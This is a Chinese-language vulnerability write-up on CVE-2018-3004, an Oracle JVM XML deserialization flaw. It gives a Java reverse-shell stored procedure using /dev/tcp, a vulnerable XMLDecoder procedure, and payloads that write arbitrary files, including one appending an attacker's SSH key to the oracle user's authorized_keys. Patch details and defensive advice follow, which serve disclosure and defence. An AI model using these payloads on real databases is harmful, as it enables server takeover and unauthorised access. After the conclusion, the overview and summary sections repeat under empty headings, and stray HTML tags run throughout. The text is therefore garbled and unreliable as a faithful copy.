Oracle数据库反序列化提权漏洞分析与利用<\/h1>

漏洞概述<\/h2>
Oracle数据库存在一个通过Java反序列化绕过Oracle JVM内置安全机制实现权限提升的漏洞(CVE-2018-3004)。攻击者可以利用此漏洞获取服务器上的shell级访问权限和数据库的SYS级别权限。<\/p>

技术背景<\/h2>

Java反序列化漏洞<\/h3>
Java反序列化漏洞自2015年Foxglove安全团队公开以来，已成为安全研究的热点。这些漏洞通常基于ysoserial库，允许攻击者通过反序列化恶意对象实现远程代码执行。<\/p>

Oracle中的Java存储过程<\/h3>

Oracle Enterprise Edition内置了Java虚拟机，支持通过Java存储过程执行Java代码：<\/p>

create<\/span> function<\/span> get_java_property(prop in<\/span> varchar2) 
<\/span><\/span>return<\/span> varchar2 is<\/span> 
<\/span><\/span>language<\/span> java name 'java.name.System.getProperty(java.lang.String) return java.lang.String'<\/span>;
<\/span><\/span><\/code><\/pre>Oracle JVM的安全机制<\/h3>
Oracle JVM实现了细粒度的安全策略控制对操作系统和文件系统的访问。例如，直接执行系统命令会被阻止：<\/p>
SET<\/span> scan off<\/span>
<\/span><\/span>create<\/span> or<\/span> replace<\/span> and<\/span> compile java source<\/span> named ReverseShell as<\/span>
<\/span><\/span>import java.io.*<\/span>;
<\/span><\/span>public<\/span> class<\/span> ReverseShell{<\/span>
<\/span><\/span>    public<\/span> static<\/span> void getConnection(String ip, String port) throws InterruptedException, IOException{<\/span>
<\/span><\/span>        Runtime r =<\/span> Runtime.getRuntime();
<\/span><\/span>        Process p =<\/span> r.exec<\/span>(new<\/span> String[]{<\/span>"\/bin\/bash"<\/span>,"-c"<\/span>,"0<&126-;exec 126<>\/dev\/tcp\/"<\/span> +<\/span> ip +<\/span> "\/"<\/span> +<\/span> port +<\/span> ";\/bin\/bash <&126 >&126 2>&126"<\/span>}<\/span>);
<\/span><\/span>        System<\/span>.out<\/span>.println(p.toString());
<\/span><\/span>        p.waitFor();
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>\/<\/span>
<\/span><\/span><\/code><\/pre>执行时会报错：<\/p>
ORA-29532: Java call terminated by uncaught Java exception:
java.security.AccessControlException: the Permission (java.io.FilePermission \/bin\/bash execute) has not been granted to TESTER. 
The PL\/SQL to grant this is dbms_java.grant_permission( 'TESTER', 'SYS:java.io.FilePermission','\/bin\/bash', 'execute' )
<\/code><\/pre>
漏洞原理<\/h2>
XML反序列化绕过<\/h3>
通过XML反序列化可以绕过Oracle JVM的安全机制。Java提供了XMLEncoder<\/code>和XMLDecoder<\/code>类用于对象的XML序列化和反序列化。<\/p>
创建易受攻击的Java存储过程：<\/p>
create<\/span> or<\/span> replace<\/span> and<\/span> compile java source<\/span> named DecodeMe as<\/span>
<\/span><\/span>import java.io.*<\/span>;
<\/span><\/span>import java.beans.*<\/span>;
<\/span><\/span>public<\/span> class<\/span> DecodeMe{<\/span>
<\/span><\/span>    public<\/span> static<\/span> void input<\/span>(String xml) throws InterruptedException, IOException {<\/span>
<\/span><\/span>        XMLDecoder decoder =<\/span> new<\/span> XMLDecoder ( new<\/span> ByteArrayInputStream(xml.getBytes()));
<\/span><\/span>        Object<\/span> object<\/span> =<\/span> decoder.readObject();
<\/span><\/span>        System<\/span>.out<\/span>.println(object<\/span>.toString());
<\/span><\/span>        decoder.close<\/span>();
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>\/<\/span>
<\/span><\/span>
<\/span><\/span>CREATE<\/span> OR<\/span> REPLACE<\/span> PROCEDURE<\/span> decodeme (p_xml IN<\/span> VARCHAR2) 
<\/span><\/span>IS<\/span> language<\/span> java name 'DecodeMe.input(java.lang.String)'<\/span>;
<\/span><\/span>\/<\/span>
<\/span><\/span><\/code><\/pre>漏洞验证<\/h3>

基本测试 - 输出到控制台：<\/li>
<\/ol>
BEGIN<\/span> 
<\/span><\/span>    decodeme('<?xml version="1.0" encoding="UTF-8" ?>
<\/span><\/span><\/span>    <java version="1.4.0" class="java.beans.XMLDecoder">
<\/span><\/span><\/span>        <object class="java.lang.System" field="out">
<\/span><\/span><\/span>            <void method="println">
<\/span><\/span><\/span>                <string>This is test output to the console<\/string>
<\/span><\/span><\/span>            <\/void>
<\/span><\/span><\/span>        <\/object>
<\/span><\/span><\/span>    <\/java>'<\/span>);
<\/span><\/span>END<\/span>;
<\/span><\/span>\/<\/span>
<\/span><\/span><\/code><\/pre>
文件写入测试 - 创建文件：<\/li>
<\/ol>
BEGIN<\/span> 
<\/span><\/span>    decodeme('
<\/span><\/span><\/span>    <java class="java.beans.XMLDecoder" version="1.4.0" >
<\/span><\/span><\/span>        <object class="java.io.FileWriter">
<\/span><\/span><\/span>            <string>\/tmp\/PleaseDoNotWork.txt<\/string>
<\/span><\/span><\/span>            <boolean>True<\/boolean>
<\/span><\/span><\/span>            <void method="write">
<\/span><\/span><\/span>                <string>Why for the love of god?<\/string>
<\/span><\/span><\/span>            <\/void>
<\/span><\/span><\/span>            <void method="close" \/>
<\/span><\/span><\/span>        <\/object>
<\/span><\/span><\/span>    <\/java>'<\/span>);
<\/span><\/span>END<\/span>;
<\/span><\/span>\/<\/span>
<\/span><\/span><\/code><\/pre>漏洞利用<\/h2>
任意文件写入<\/h3>
攻击者可以覆盖或附加Oracle用户有权限的任何文件，可能导致：<\/p>

拒绝服务攻击<\/li>
数据损坏<\/li>
系统完全沦陷<\/li>
<\/ul>
获取系统访问权限<\/h3>
通过向Oracle用户的.ssh\/authorized_keys<\/code>文件添加攻击者的RSA公钥，可以获取SSH访问权限：<\/p>
BEGIN<\/span> 
<\/span><\/span>    decodeme('
<\/span><\/span><\/span>    <java class="java.beans.XMLDecoder" version="1.4.0">
<\/span><\/span><\/span>        <object class="java.io.FileWriter">
<\/span><\/span><\/span>            <string>\/home\/oracle\/.ssh\/authorized_keys<\/string>
<\/span><\/span><\/span>            <boolean>True<\/boolean>
<\/span><\/span><\/span>            <void method="write">
<\/span><\/span><\/span>                <string>ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCedKQPeoJ1UeJEW6ZVkiuWAxBKW8F4fc0VrWxR5HEgaAcVodhgc6X7klyOWrJceGqICcCZd6K+\/lvI3xaE2scJpRZWlcJQNCoZMRfmlhibq9IWMH0dm5LqL3QMqrXzZ+a2dfNohSdSmLDTaFHkzOGKEQIwHCv\/e4e\/eKnm0fUWHeL0k4KuCn3MQUN1HwoqoCciR0DrBDOYAKHxqpBv9rDneCdvaS+tqlr5eShjNlHv1YzJGb0lZZlsny19is8CkhcZ6+O+UCKoBPrxaGsfipsEIH5aPu9xVA90Xgsakhg4yoy9FLnES+xmnVxKX5GHyixi3qeWGDwBsAvhAAGLxOc5<\/string>
<\/span><\/span><\/span>            <\/void>
<\/span><\/span><\/span>            <void method="close" \/>
<\/span><\/span><\/span>        <\/object>
<\/span><\/span><\/span>    <\/java>'<\/span>);
<\/span><\/span>END<\/span>;
<\/span><\/span>\/<\/span>
<\/span><\/span><\/code><\/pre>影响范围<\/h2>

Oracle 12C及更早版本<\/li>
共享租户模型环境（多个应用共享同一数据库）<\/li>
Oracle Exadata实现（同一服务器托管多个数据库实例）<\/li>
<\/ul>
修复方案<\/h2>
Oracle已发布补丁修复此漏洞：<\/p>

Oracle错误号：Bug 27923353<\/li>
补丁版本：OJVM 12.2.0.1.180717 (p27923353_122010_Linux-x86-64.zip)<\/li>
<\/ul>
防御建议<\/h2>

及时应用Oracle发布的安全补丁<\/li>
限制数据库用户的权限，遵循最小权限原则<\/li>
监控异常的文件系统修改<\/li>
定期审计数据库中的Java存储过程<\/li>
限制数据库服务器的网络访问，特别是SSH服务<\/li>
<\/ol>
总结<\/h2>
此漏洞展示了Java反序列化漏洞不仅存在于应用服务器中，也可能出现在嵌入式实现如数据库的Java虚拟机中。安全研究人员需要拓宽视野，考虑各种环境下的反序列化攻击向量。<\/p>

Oracle数据库反序列化提权漏洞分析与利用<\/h1>

漏洞概述<\/h2> Oracle数据库存在一个通过Java反序列化绕过Oracle JVM内置安全机制实现权限提升的漏洞(CVE-2018-3004)。攻击者可以利用此漏洞获取服务器上的shell级访问权限和数据库的SYS级别权限。<\/p>

技术背景<\/h2>

Java反序列化漏洞<\/h3> Java反序列化漏洞自2015年Foxglove安全团队公开以来，已成为安全研究的热点。这些漏洞通常基于ysoserial库，允许攻击者通过反序列化恶意对象实现远程代码执行。<\/p>

漏洞原理<\/h2>

漏洞利用<\/h2>

总结<\/h2> 此漏洞展示了Java反序列化漏洞不仅存在于应用服务器中，也可能出现在嵌入式实现如数据库的Java虚拟机中。安全研究人员需要拓宽视野，考虑各种环境下的反序列化攻击向量。<\/p>

漏洞概述<\/h2>
Oracle数据库存在一个通过Java反序列化绕过Oracle JVM内置安全机制实现权限提升的漏洞(CVE-2018-3004)。攻击者可以利用此漏洞获取服务器上的shell级访问权限和数据库的SYS级别权限。<\/p>

Java反序列化漏洞<\/h3>
Java反序列化漏洞自2015年Foxglove安全团队公开以来，已成为安全研究的热点。这些漏洞通常基于ysoserial库，允许攻击者通过反序列化恶意对象实现远程代码执行。<\/p>

总结<\/h2>
此漏洞展示了Java反序列化漏洞不仅存在于应用服务器中，也可能出现在嵌入式实现如数据库的Java虚拟机中。安全研究人员需要拓宽视野，考虑各种环境下的反序列化攻击向量。<\/p>